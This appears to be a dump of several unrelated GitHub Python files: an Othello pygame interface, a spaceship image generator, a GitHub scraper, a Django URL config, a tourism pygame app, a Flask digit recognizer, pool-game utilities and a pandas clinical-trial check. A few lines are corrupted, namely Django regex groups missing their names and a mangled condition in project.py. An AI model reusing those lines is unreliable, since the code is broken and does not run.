pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n # Change x, y screen coordinates to grid coordinates\n column = pos[0] // (self.WIDTH + self.MARGIN)\n row = pos[1] // (self.HEIGHT + self.MARGIN)\n return (row, column)\n pygame.quit() \n\n def reset_square(self, pos):\n \"\"\"Reset squares back to original color.\"\"\"\n x = (self.MARGIN + self.WIDTH) * pos[0] + self.MARGIN\n y = (self.MARGIN + self.WIDTH) * pos[1] + self.MARGIN \n pygame.draw.rect(self.screen, self.GREEN, [x, y, self.WIDTH, self.HEIGHT])\n pygame.display.flip()\n\n def update(self, board):\n \"\"\"Update the screen.\"\"\"\n for i in range(8):\n for j in range(8):\n self.reset_square((j, i)) \n if board.get((i, j)) != None:\n self.draw_disk(board.get((i, j)), j, i) \n pygame.display.flip()\n \n def show_valid_moves(self, moves):\n \"\"\"Display valid squares current player can move to in yellow.\"\"\" \n for move in moves:\n x = (self.MARGIN + self.WIDTH) * move[1] + self.MARGIN\n y = (self.MARGIN + self.WIDTH) * move[0] + self.MARGIN\n pygame.draw.rect(self.screen, self.YELLOW, [x, y, self.WIDTH, self.HEIGHT])\n pygame.display.flip()\n \n def score(self, player):\n \"\"\"Display the score and keep the screen open until user closes it.\"\"\"\n done = False\n while not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True \n self.screen.fill(self.BLACK)\n font = pygame.font.SysFont('Arial', 20)\n if player == 'B':\n display = font.render(\"You won!\", True, self.WHITE)\n elif player == 'W':\n display = font.render(\"White won!\", True, self.WHITE)\n else:\n display = font.render(\"Tie!\", True, self.WHITE)\n self.screen.blit(display, \n display.get_rect(\n center=(self.screen.get_width()/2, self.screen.get_height()/2)))\n pygame.display.flip()\n pygame.quit()","repo_name":"pearllaw/Othello","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"69999192852","text":"import numpy as np\nfrom skimage.draw import polygon_perimeter, line\nfrom shapely.geometry import Polygon\nfrom typing import Tuple, Optional\n\n\ndef _rotation(pts: np.ndarray, theta: float) -> np.ndarray:\n r = np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]])\n pts = pts @ r\n return pts\n\n\ndef _make_box_pts(\n pos_x: float, pos_y: float, yaw: float, dim_x: float, dim_y: float\n) -> np.ndarray:\n\n hx = dim_x / 2\n hy = dim_y / 2\n\n pts = np.asarray([(-hx, -hy), (-hx, hy), (hx, hy), (hx, -hy)])\n pts = _rotation(pts, yaw)\n pts += (pos_x, pos_y)\n return pts\n\n\ndef _make_spaceship(\n pos: np.asarray, yaw: float, scale: float, l2w: float, t2l: float\n) -> Tuple[np.ndarray, np.ndarray]:\n\n dim_x = scale\n dim_y = scale * l2w\n\n # spaceship\n x1 = (0, dim_y)\n x2 = (-dim_x / 2, 0)\n x3 = (0, dim_y * t2l)\n x4 = (dim_x / 2, 0)\n pts = np.asarray([x1, x2, x3, x4])\n pts[:, 1] -= dim_y / 2\n\n # rotation + translation\n pts = _rotation(pts, yaw)\n pts += pos\n\n # label\n # pos_y, pos_x, yaw, dim_x, dim_y\n params = np.asarray([*pos, yaw, dim_x, dim_y])\n\n return pts, params\n\n\ndef _get_pos(s: float) -> np.ndarray:\n return np.random.randint(10, s - 10, size=2)\n\n\ndef _get_yaw() -> float:\n return np.random.rand() * 2 * np.pi\n\n\ndef _get_size() -> int:\n return np.random.randint(18, 37)\n\n\ndef _get_l2w() -> float:\n return abs(np.random.normal(3 / 2, 0.2))\n\n\ndef _get_t2l() -> float:\n return abs(np.random.normal(1 / 3, 0.1))\n\n\ndef make_data(\n has_spaceship: bool = None,\n noise_level: float = 0.8,\n no_lines: int = 6,\n image_size: int = 200,\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\" Data generator\n\n Args:\n has_spaceship (bool, optional): Whether a spaceship is included. Defaults to None (randomly sampled).\n noise_level (float, optional): Level of the background noise. Defaults to 0.8.\n no_lines (int, optional): No. of lines for line noise. Defaults to 6.\n image_size (int, optional): Size of generated image. Defaults to 200.\n\n Returns:\n Tuple[np.ndarray, np.ndarray]: Generated Image and the corresponding label\n The label parameters are x, y, yaw, x size, and y size respectively\n An empty array is returned when a spaceship is not included.\n \"\"\"\n\n if has_spaceship is None:\n has_spaceship = np.random.choice([True, False], p=(0.8, 0.2))\n\n img = np.zeros(shape=(image_size, image_size))\n label = np.full(5, np.nan)\n\n # draw ship\n if has_spaceship:\n\n params = (_get_pos(image_size), _get_yaw(), _get_size(), _get_l2w(), _get_t2l())\n pts, label = _make_spaceship(*params)\n\n rr, cc = polygon_perimeter(pts[:, 0], pts[:, 1])\n valid = (rr >= 0) & (rr < image_size) & (cc >= 0) & (cc < image_size)\n\n img[rr[valid], cc[valid]] = np.random.rand(np.sum(valid))\n\n # noise lines\n line_noise = np.zeros(shape=(image_size, image_size))\n for _ in range(no_lines):\n rr, cc = line(*np.random.randint(0, 200, size=4))\n line_noise[rr, cc] = np.random.rand(rr.size)\n\n # combined noise\n noise = noise_level * np.random.rand(image_size, image_size)\n img = np.stack([img, noise, line_noise], axis=0).max(axis=0)\n\n img = img.T # ensure image space matches with coordinate space\n\n return img, label\n\n\ndef score_iou(ypred: np.ndarray, ytrue: np.ndarray) -> Optional[float]:\n\n assert (\n ypred.size == ytrue.size == 5\n ), \"Inputs should have 5 parameters, use null array for empty predictions/labels.\"\n\n no_pred = np.any(np.isnan(ypred))\n no_label = np.any(np.isnan(ytrue))\n\n if no_label and no_pred:\n # true negative\n return None\n elif no_label and not no_pred:\n # false positive\n return 0\n elif not no_label and not no_pred:\n # true positive\n t = Polygon(_make_box_pts(*ytrue))\n p = Polygon(_make_box_pts(*ypred))\n iou = t.intersection(p).area / t.union(p).area\n return iou\n elif not no_label and no_pred:\n # false negative\n return 0\n else:\n raise NotImplementedError\n","repo_name":"jaymody/spaceship","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"73785057809","text":"# Scraping github to extract user name and profile picture\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nusername = input('Enter your github username: \\n')\ngithub_url = 'https://github.com/' + username\n\ndata_request = requests.get(github_url)\n\nsoup = BeautifulSoup(data_request.content, 'html.parser')\n\nprofile_picture = soup.find('img', {'style': 'height:auto;'})['src']\nuser_name = soup.find(class_='p-name').get_text()\n\nprint(user_name)\nprint(profile_picture)\n","repo_name":"femiteontop/WebScraping","sub_path":"WebScraping.py","file_name":"WebScraping.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"23176899110","text":"def sort(x, l): # - сортировка элементов списка\n q = int() # - пустая целочисленная переменная(нужна для сохранения элемента, который будем менять местами с элементом сравнения)\n F = bool() # - пустая \"булева\" переменная\n for k in range(1,l): # - \n F = False\n for i in range(l-k):\n if x[i+1] < x[i]: # - сравнение двух соседних элементов\n q = x[i] # - присвоение пустой переменной наибольшего элемента для его сохранения.\n x[i] = x[i+1] # - сортировка элементов по убыванию (меньший элемент ставим на текущую позицию, больший на следующую)\n x[i+1] = q # - присвоение следующей позиции большего элемента\n F = True # - по окончанию сортировки двух соседних элементов переменной F присваивается значение True и вложенный цикл начинается сначала\n\t\t\t\t\t\t # - # - Далее, мы выходим из внутреннего цикла for и берём следующий интервал элементов. \n\t\t\t\t\t\t # - Если следующие два соседних элемента не удовлетворют условию if во вложенном цикле, то переменная F сохраняет значение False.\n if F == False: # - Таким образом мы проходим весь список два раза. Если бы был только один цикл, то элемент списка остался бы неотсортированным. После того, как все элементы отсортированы (внешний for закончил свою работу), F присваивает False, и мы выходим из внутреннего цикла \n break # - Затем, возвращаем конечное значение списка и выводим его на экран.\n return x\n\n\t\nx = list(map(int, input('Input elements: ').split( )))\nl = len(x)\n\nsort(x, l)\nprint(sort(x, l))\n","repo_name":"ElvisMongo/Mysnake","sub_path":"Home_task_6.py","file_name":"Home_task_6.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71045213332","text":"from django.conf.urls import url\nfrom django.views.static import serve\nfrom django.conf import settings\nfrom . import views,upload\n\napp_name= 'app'\nurlpatterns = [\n url(r'^$',views.index,name='index'),\n url(r'^archive/$', views.archive, name='archive'),\n url(r'^category/$', views.category, name='category'),\n url(r'^article/$', views.article, name='article'),\n url(r'^tag/$', views.tag, name='tag'),\n url(r'uploads/(?P.*)', serve, {'document_root': settings.MEDIA_ROOT}),\n url(r'^admin/upload/(?P[^/]+)$', upload.upload_image, name='upload_image'),\n]","repo_name":"tinglinux/amaryllis","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22030778813","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 17-03-2019 at 02:52 PM\n\n@author: Vivek\n\"\"\"\n\n# Function returning multiple values of different data types\ndef someFunction():\n name = 'Alice'\n ID = 'EMP001'\n salary = 10000\n return name, ID, salary\n\nif __name__ == '__main__':\n # Multiple assignment\n x, y = 10, 20\n print('X:',x,'Y:',y)\n\n # Temporary tuple, pass-by-value assignment\n x, y = y, x\n print('X:', x, 'Y:', y)\n\n # String data type assignment\n x, y = 'OK'\n print('X:', x, 'Y:', y)\n\n # Multiple function return value assignment\n empName, empID, empSalary = someFunction()\n print('Name:', empName, ', ID:', empID, ', Salary:', empSalary)\n\n # Automatically unpacking elements of a list inside a loop\n list = [('Alice', 25), ('Bob', 30), ('Jake', 27), ('Barbara', 40)]\n for name, age in list:\n print(name, 'is aged', str(age))\n","repo_name":"VivekShri/PyProwess","sub_path":"examples/implicit-tuple-unpacking.py","file_name":"implicit-tuple-unpacking.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"66"} +{"seq_id":"34129134580","text":"import pygame\nimport time\npygame.init()\npygame.font.init()\npygame.mixer.init()\npygame.mixer.pre_init(frequency=44100,size=-16,channels=2,buffer=512)\n#Nền\na=(800,600)\nscreen=pygame.display.set_mode(a)\npygame.display.set_caption('Quê Lúa Yên Thành')\nWHITE=(255,255,255)\nBLACK=(0,0,0)\nfont = pygame.font.Font('freesansbold.ttf', 32)\ndialogue_font = pygame.font.SysFont('utf8', 32)\nrunning=True\nlanguage=0\nbg=pygame.image.load(('bg1.jpg'))\nbando=pygame.image.load(('map.png'))\nmenu=pygame.image.load(('menu.png'))\nhome=pygame.image.load(('home.png'))\nhome=pygame.transform.scale(home,(50,50))\ndichvu1=pygame.image.load(('amthuc.png'))\ndichvu1=pygame.transform.scale(dichvu1,a)\ndichvu2=pygame.image.load(('nghiduong.png'))\ndichvu2=pygame.transform.scale(dichvu2,a)\ndichvu3=pygame.image.load(('giaothong.png'))\ndichvu3=pygame.transform.scale(dichvu3,a)\nback1=pygame.image.load(('Back1.png'))\nback1=pygame.transform.scale(back1,(100,50))\nmuiten1=pygame.image.load(('arrowleft.png'))\nmuiten1=pygame.transform.scale(muiten1,(200,200))\nmuiten2=pygame.image.load(('arrowright.png'))\nmuiten2=pygame.transform.scale(muiten2,(200,200))\nx='bg'\ndichvu=0\n# các biến trong map\nlocation=0\ndencuong=0\ntruongbon=0\n#Đền Cuông\ndencuong1=pygame.image.load(('dencuong/ĐC1.jpeg'))\ndencuong1=pygame.transform.scale(dencuong1,a)\ndencuong2=pygame.image.load(('dencuong/ĐC2.jpeg'))\ndencuong2=pygame.transform.scale(dencuong2,a)\ndencuong3=pygame.image.load(('dencuong/ĐC3.jpeg'))\ndencuong3=pygame.transform.scale(dencuong3,a)\ndencuong4=pygame.image.load(('dencuong/ĐC4.jpeg'))\ndencuong4=pygame.transform.scale(dencuong4,a)\ndencuong5=pygame.image.load(('dencuong/ĐC6.jpeg'))\ndencuong5=pygame.transform.scale(dencuong5,a)\ndencuong6=pygame.image.load(('dencuong/ĐC7.jpeg'))\ndencuong6=pygame.transform.scale(dencuong6,a)\ndencuong7=pygame.image.load(('dencuong/ĐC8.jpeg'))\ndencuong7=pygame.transform.scale(dencuong7,a)\ndencuong8=pygame.image.load(('dencuong/ĐC9.jpeg'))\ndencuong8=pygame.transform.scale(dencuong8,a)\ndencuong9=pygame.image.load(('dencuong/ĐC10.jpeg'))\ndencuong9=pygame.transform.scale(dencuong9,a)\n#Truông Bồn\ntruongbonbg_sound=pygame.mixer.Sound('truongbon/bg.mp3')\ntruongbonbg=pygame.image.load(('truongbon/bg.png'))\ntruongbonbg=pygame.transform.scale(truongbonbg,a)\n#Main\nwhile running:\n\tmouse_x,mouse_y=pygame.mouse.get_pos()\n\tprint(mouse_x,mouse_y,x,location)\n\tscreen.blit(bg,(0,0))\n\t#Tương tác\n\tfor event in pygame.event.get():\n\t\tif event.type==pygame.QUIT:\n\t\t\trunning=False\n\t\tif event.type==pygame.MOUSEBUTTONDOWN:\n\t\t\tif event.button==1:\n\t\t\t#Menu\n\t\t\t\tif (mouse_x>260 and mouse_x<522) and (mouse_y>320 and mouse_y<400) and x=='bg':\n\t\t\t\t\tx='menu'\n\t\t\t\t\tbreak\n\t\t\t#Nút Home\n\t\t\t\tif (mouse_x>0 and mouse_x<45) and (mouse_y>0 and mouse_y<50):\n\t\t\t\t\tx='bg'\n\t\t\t#Dịch vụ\n\t\t\t\tif (mouse_x>259 and mouse_x<525) and (mouse_y>345 and mouse_x<435) and x=='menu':\n\t\t\t\t\tx='dichvu'\n\t\t\t\tif x=='dichvu':\n\t\t\t\t\tif (mouse_x>50 and mouse_x<255) and (mouse_y>10 and mouse_y<100):\n\t\t\t\t\t\tdichvu-=1\n\t\t\t\t\t\tif dichvu<0:\n\t\t\t\t\t\t\tdichvu=0\n\t\t\t\t\telif (mouse_x>550 and mouse_x<755) and (mouse_y>10 and mouse_y<100):\n\t\t\t\t\t\tdichvu+=1\n\t\t\t\t\t\tif dichvu>2:\n\t\t\t\t\t\t\tdichvu=2\n\t\t\t\t\telif (mouse_x>700 and mouse_x<800) and (mouse_y>555 and mouse_y<600):\n\t\t\t\t\t\tx='menu'\n\t\t\t#Bản đồ \n\t\t\t\tif (mouse_x>250 and mouse_x<525) and (mouse_y>168 and mouse_y<262) and x=='menu':\n\t\t\t\t\tx='bando'\n\t\t\t\t#Chọn địa điểm\n\t\t\t\tif x=='bando':\n\t\t\t\t\tif(mouse_x>617 and mouse_x<660) and (mouse_y>368 and mouse_y<408):\n\t\t\t\t\t\tlocation='dencuong'\n\t\t\t\t\t\tx=0\n\t\t\t\t\t\tdencuong=0\n\t\t\t\t\tif(54520 and mouse_x<140) and (118:\n\t\t\t\t\t\t\tdencuong=8\n\t\t\t\tif (mouse_x>0 and mouse_x<100) and (mouse_y>555 and mouse_y<600) and location !=0:\n\t\t\t\t\tlocation=0\n\t\t\t\t\tx='bando'\n#Chuyển Phông Nền\n\tif x=='bg':\n\t\tscreen.blit(bg,(0,0))\n\telif x=='menu':\n\t\tscreen.blit(menu,(0,0))\n\telif x=='bando':\n\t\tscreen.blit(bando,(0,0))\n\t\ttruongbonbg_sound.stop()\n\telif x=='dichvu':\n\t\tif dichvu==0:\n\t\t\tscreen.blit(dichvu1,(0,0))\n\t\tif dichvu==1:\n\t\t\tscreen.blit(dichvu2,(0,0))\n\t\tif dichvu==2:\n\t\t\tscreen.blit(dichvu3,(0,0))\n\t\tscreen.blit(back1,(700,555))\n\tif x!='bg':\n\t\tscreen.blit(home,(0,0))\n#Bản đồ\n\t#Đền Cuông\n\tif location=='dencuong':\n\t\tif dencuong==0:\n\t\t\tscreen.blit(dencuong1,(0,0))\n\t\tif dencuong==1:\n\t\t\tscreen.blit(dencuong2,(0,0))\n\t\tif dencuong==2:\n\t\t\tscreen.blit(dencuong3,(0,0))\n\t\tif dencuong==3:\n\t\t\tscreen.blit(dencuong4,(0,0))\n\t\tif dencuong==4:\n\t\t\tscreen.blit(dencuong5,(0,0))\n\t\tif dencuong==5:\n\t\t\tscreen.blit(dencuong6,(0,0))\n\t\tif dencuong==6:\n\t\t\tscreen.blit(dencuong7,(0,0))\n\t\tif dencuong==7:\n\t\t\tscreen.blit(dencuong8,(0,0))\n\t\tif dencuong==8:\n\t\t\tscreen.blit(dencuong9,(0,0))\n\t\tscreen.blit(muiten1,(-20,-40))\n\t\tscreen.blit(muiten2,(620,-40))\n\t\tscreen.blit(back1,(0,555))\n\tif location=='truongbon':\n\t\tscreen.blit(truongbonbg,(0,0))\n\t\ttruongbonbg_sound.play()\n\t\tscreen.blit(back1,(0,555))\n\tpygame.display.flip()\npygame.quit()","repo_name":"DuyAn4648/project","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4055873466","text":"import logging\r\nimport os\r\nimport pickle\r\n\r\nimport cv2\r\nimport sklearn\r\nimport matplotlib\r\nimport numpy as np\r\nmatplotlib.use('Agg')\r\nimport tensorflow\r\nimport tensorflow_hub as hub\r\nfrom flask import Flask, render_template, request, send_from_directory, url_for\r\nfrom PIL import Image\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom utils import grab_contours, sort_contours, label_contour, resize_image\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.axis(\"off\")\r\n\r\n# Kernel for OpenCV morphological operations\r\nkernel = np.ones((1,1),np.uint8)\r\n\r\n# Disable Tensorflow warnings\r\nlogging.disable(logging.WARNING)\r\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\r\n\r\n# Folder to store images\r\nIMAGE_FOLDER = 'static/images'\r\n\r\napp = Flask(__name__)\r\napp.config['IMAGE_FOLDER'] = IMAGE_FOLDER\r\n\r\n# Set Tensorflow to use CPU\r\ntensorflow.config.set_visible_devices([], 'GPU')\r\n\r\n# Load the model\r\nmodel = load_model(\"model/model.h5\")\r\n\r\n# Home Page\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n# Prediction page\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef upload():\r\n if request.method == \"POST\":\r\n f = request.files[\"image\"]\r\n filepath = (f.filename)\r\n # Save the image\r\n f.save(os.path.join(app.config['IMAGE_FOLDER'], filepath))\r\n\r\n upload_img = os.path.join(IMAGE_FOLDER, filepath)\r\n\r\n image = cv2.imread(upload_img) # Read the image\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # Convert to grayscale\r\n gray = cv2.GaussianBlur(gray, (3, 3), 0) # Noise Removal\r\n edged = cv2.Canny(gray, 40, 120) # Detect edges\r\n \r\n # Isolate individual digits\r\n cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2:]\r\n cnts = grab_contours(cnts)\r\n\r\n if cnts == (): # If no digits detected\r\n predictions = ['None']\r\n bbox_path = upload_img\r\n else:\r\n cnts = sort_contours(cnts, method='left-to-right')[0]\r\n \r\n extracted_digits = []\r\n i = 0\r\n # Loop over the detected contours\r\n for c in cnts:\r\n # Compute bounding box of the contour\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n cv2.rectangle(image, (x, y), (x+w, y+h), color=(0, 255, 0), thickness=2) \r\n\r\n # Filter extracted bounding boxes based on size criteria to avoid processing unwanted contours\r\n if (w >= 5 and w <= 150) and (h >= 15 and h <= 120):\r\n i += 1 \r\n # Extract the character\r\n roi = gray[y:y + h, x:x + w]\r\n \r\n # Perform image inverting it to make the digit appear as *white* (foreground) on a *black* background\r\n thresh = cv2.bitwise_not(roi)\r\n \r\n # Resize the image to 28x28 pixels\r\n thresh = resize_image(thresh) \r\n \r\n # Noise removal before feeding to the model\r\n thresh = cv2.medianBlur(thresh, 3)\r\n thresh = cv2.GaussianBlur(thresh, (3,3), 0)\r\n thresh = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel)\r\n \r\n # Normalize pixel values between 0 and 1\r\n thresh = thresh / 255.0\r\n \r\n plt.imshow(thresh, cmap='gray')\r\n plt.savefig('static/images/digits/digit_' + str(i))\r\n \r\n # Add to list of extracted individual digits\r\n extracted_digits.append(thresh)\r\n\r\n # Plot uploaded image with bounding boxes around individual digits\r\n bbox_path = os.path.join(app.config['IMAGE_FOLDER'], 'bbox.png')\r\n plt.imshow(image, cmap = 'gray')\r\n plt.savefig(bbox_path)\r\n\r\n \r\n # Make predictions on the extracted digits and display the output\r\n predictions = []\r\n if len(extracted_digits) == 0:\r\n predictions = ['None']\r\n bbox_path = upload_img\r\n else:\r\n extracted_digits = np.array(extracted_digits)\r\n predictions = model.predict(extracted_digits)\r\n predictions = np.argmax(predictions, axis=1)\r\n \r\n return render_template('predict.html', num=predictions, img_path = bbox_path)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, threaded=False)","repo_name":"IBM-EPBL/IBM-Project-10449-1659180179","sub_path":"Project Development Phase/Sprint 4/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2843269736","text":"import cv2\nimport math\nimport numpy as np\n\nWHITE = (255, 255, 255)\nYELLOW = (0, 255, 255)\nRED = (0, 0, 255)\nGREEN = (0, 255, 0)\nBLACK = (0, 0, 0)\nPI = 3.14\nWAIT_TIME = 1000\nHOLES = [(240, 136),\n (942, 136),\n (1684, 136),\n (1684, 802),\n (942, 814),\n (240, 798)]\nLINE_THICKNESS = 4\nGHOST_SIZE = 25\n\n\ndef pre_processing(frame, threshold1, threshold2, k=3):\n frame_processed = cv2.GaussianBlur(frame, (5, 5), 3)\n frame_processed = cv2.Canny(frame_processed, threshold1, threshold2)\n kernel = np.ones((k, k), np.uint8)\n frame_processed = cv2.dilate(frame_processed, kernel, iterations=1)\n frame_processed = cv2.morphologyEx(frame_processed, cv2.MORPH_CLOSE, kernel)\n return frame_processed\n\n\ndef find_contours(img, imgPre, minArea=1000, sort=True, filter=0, drawCon=False, c=(0, 255, 0)):\n \"\"\"\n Finds Contours in an image\n :param img: Image on which we want to draw\n :param imgPre: Image on which we want to find contours\n :param minArea: Minimum Area to detect as valid contour\n :param sort: True will sort the contours by area (biggest first)\n :param filter: Filters based on the corner points e.g. 4 = Rectangle or square\n :param drawCon: draw contours boolean\n :return: Foudn contours with [contours, Area, BoundingBox, Center]\n \"\"\"\n conFound = []\n imgContours = img.copy()\n contours, hierarchy = cv2.findContours(imgPre, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for cnt in contours:\n area = cv2.contourArea(cnt)\n\n if area > minArea:\n peri = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.02 * peri, True)\n if len(approx) == filter or filter == 0:\n x, y, w, h = cv2.boundingRect(approx)\n cx, cy = x + (w // 2), y + (h // 2)\n if drawCon:\n cv2.drawContours(imgContours, cnt, -1, c, 3)\n cv2.rectangle(imgContours, (x, y), (x + w, y + h), c, 2)\n cv2.circle(imgContours, (x + (w // 2), y + (h // 2)), 5, c, cv2.FILLED)\n cv2.putText(imgContours, str(area), (x + (w // 2), y + (h // 2)), cv2.FONT_HERSHEY_SIMPLEX, 1,\n (255, 0, 0), 2)\n conFound.append({\"cnt\": cnt, \"area\": area, \"bbox\": [x, y, w, h], \"center\": [cx, cy]})\n\n if sort:\n conFound = sorted(conFound, key=lambda x: x[\"area\"], reverse=True)\n\n return imgContours, conFound\n\n\ndef calculate_projection(x1, y1, x2, y2, length):\n length_AB = ((x2 - x1) ** 2 + (y2 - y1) ** 2)\n x3 = int(x2 + (x2 - x1) / int(length_AB) * length)\n y3 = int(y2 + (y2 - y1) / int(length_AB) * length)\n\n return x3, y3\n\n\ndef draw_contour(img, x, y, w, h, i=100):\n cv2.rectangle(img, (x, y), (x + w, y + h), RED, 2)\n cv2.circle(img, (x + (w // 2), y + (h // 2)), 5, RED, cv2.FILLED)\n cv2.circle(img, (x + (w // 2), y + (h // 2)), 25, RED, 1)\n if i != 100:\n cv2.putText(img, str(i), (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1, WHITE, 2)\n\n\n# Check if any hole is hit by calculating if is\n# inside one another\ndef result(frame, x, y, radius=35):\n inside = 0\n for hole in HOLES:\n square_dist = (hole[0] - x) ** 2 + (hole[1] - y) ** 2\n if square_dist < radius ** 2:\n inside += 1\n\n if inside > 0:\n cv2.putText(frame, 'IN', (750, 400), cv2.FONT_HERSHEY_SIMPLEX, 3, GREEN, 9)\n return GREEN\n else:\n cv2.putText(frame, 'OUT', (750, 400), cv2.FONT_HERSHEY_SIMPLEX, 3, RED, 9)\n return RED\n\n\ndef line_intersection(line1, line2):\n \"\"\"\n https://stackoverflow.com/a/20677983\n \"\"\"\n xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])\n ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])\n\n def det(a, b):\n return a[0] * b[1] - a[1] * b[0]\n\n div = det(xdiff, ydiff)\n if div == 0:\n raise Exception('lines do not intersect')\n\n d = (det(*line1), det(*line2))\n x = det(d, xdiff) / div\n y = det(d, ydiff) / div\n return int(x), int(y)\n\n\ndef find_angle(img, point1, point2, point3, show_degrees=False):\n x1, y1 = point1[0], point1[1]\n x2, y2 = point2[0], point2[1]\n x3, y3 = point3[0], point3[1]\n\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 - y2, x1 - x2))\n\n if show_degrees:\n cv2.putText(img, str(int(angle + 360)), (x2 - 50, y2 + 50),\n cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2)\n\n return angle + 360 if angle < 0 else angle\n","repo_name":"raulperezalejo/pool_game_predicton","sub_path":"pool_utils.py","file_name":"pool_utils.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21317043876","text":"import pandas as pd\nimport math\nfrom datetime import datetime\nfrom revision_fechas import revision_fecha\nfrom log_writer import log_writer\nimport warnings\npd.set_option('display.max_columns', None)\nfrom openpyxl import load_workbook\nfrom openpyxl.utils.dataframe import dataframe_to_rows\n\n\n\ndef adminsitration_CpG_ODN(df_root, path_excel_writer):\n '''\n Esta funcion tiene como finalidad la revision de cada uno de los puntos \n del edit check para el formulario de CpG ODN D35 Administration\n '''\n\n df = df_root[df_root['name']=='CpG ODN D35 Administration'] \n lista_sujetos = df['Participante'].unique()\n\n df = df[['name', 'Visit', 'activityState', 'Participante', 'Estado del Participante', 'Campo', 'Valor', 'FormFieldInstance Id', 'displayName']]\n df['Value_id'] = df['Valor'].astype(str) + '|' + df['FormFieldInstance Id'].astype(str) + '|' + df['displayName'].astype(str)\n\n df_date_visit = df_root[df_root['name']== 'Date of visit']\n df_date_visit = df_date_visit[['Visit','Participante', 'Campo', 'Valor']]\n df_date_visit = df_date_visit[df_date_visit['Campo']== 'Visit Date']\n df_date_visit['to_join'] = df_date_visit['Valor']\n df_date_visit = df_date_visit[['Participante', 'to_join','Visit', 'Valor']]\n df_date_visit = df_date_visit.rename(columns={'Participante':'Subject' ,'Visit':'visita_para_comparar', 'Valor':'Date_of_visit_value'})\n\n df_informed = df_root[df_root['name']=='Informed Consent']\n df_informed = df_informed[['Visit','Participante', 'Campo', 'Valor']]\n df_informed = df_informed[df_informed['Campo']=='Informed consent signature date']\n df_informed = df_informed[['Participante','Valor']]\n df_informed = df_informed.rename(columns={'Participante':'Subject', 'Valor':'Inform_consent_date'})\n\n df_date_visit_randomization = df_root[df_root['name']== 'Date of visit']\n df_date_visit_randomization = df_date_visit_randomization[['Visit','Participante', 'Campo', 'Valor']]\n df_date_visit_randomization = df_date_visit_randomization[df_date_visit_randomization['Campo']== 'Visit Date']\n df_date_visit_randomization = df_date_visit_randomization[df_date_visit_randomization['Visit']== 'D-1']\n df_date_visit_randomization = df_date_visit_randomization[['Participante','Valor']]\n df_date_visit_randomization = df_date_visit_randomization.rename(columns={'Participante':'Subject', 'Valor':'Visita_randomization'})\n\n df_adverse = df_root[df_root['name']=='Adverse Events']\n df_adverse = df_adverse[['Visit','Participante', 'Campo', 'Valor']]\n df_adverse = df_adverse[df_adverse['Campo']== 'Action taken with study treatment (CPG ODN D35)']\n df_adverse = df_adverse[['Participante','Valor']]\n df_adverse = df_adverse.rename(columns={'Participante':'Subject', 'Valor':'action_taken_study_treatment'})\n\n lista_revision = []\n lista_logs = ['CpG ODN D35 Administration']\n\n for sujeto in lista_sujetos:\n sujeto_principal = df[df['Participante']== sujeto]\n sujeto_principal = sujeto_principal.sort_values(by=['FormFieldInstance Id'], ascending=True)\n sujeto_principal = sujeto_principal.reset_index(drop=True)\n\n # Los formularios que estan clasificados como unscheduled, no se pueden iterar con la visita, por lo que usamos el siguiente codigo para realizar la particion\n #p\n date_indices = sujeto_principal.index[sujeto_principal['Campo'] == 'Date of dosing'].tolist()\n subdatasets = [sujeto_principal.iloc[start:end] for start, end in zip(date_indices, date_indices[1:] + [None])]\n\n date_dosing_list_review = []\n\n for subdataset in subdatasets:\n\n pru = subdataset\n pru = pru[['Campo', 'Value_id']].T\n new_columns = pru.iloc[0]\n pru = pru[1:].set_axis(new_columns, axis=1)\n pru['Subject'] = sujeto\n pru['Visit'] = 'unscheduled'\n pru['status'] = 'doesnt matter'\n pru['to_join'] = 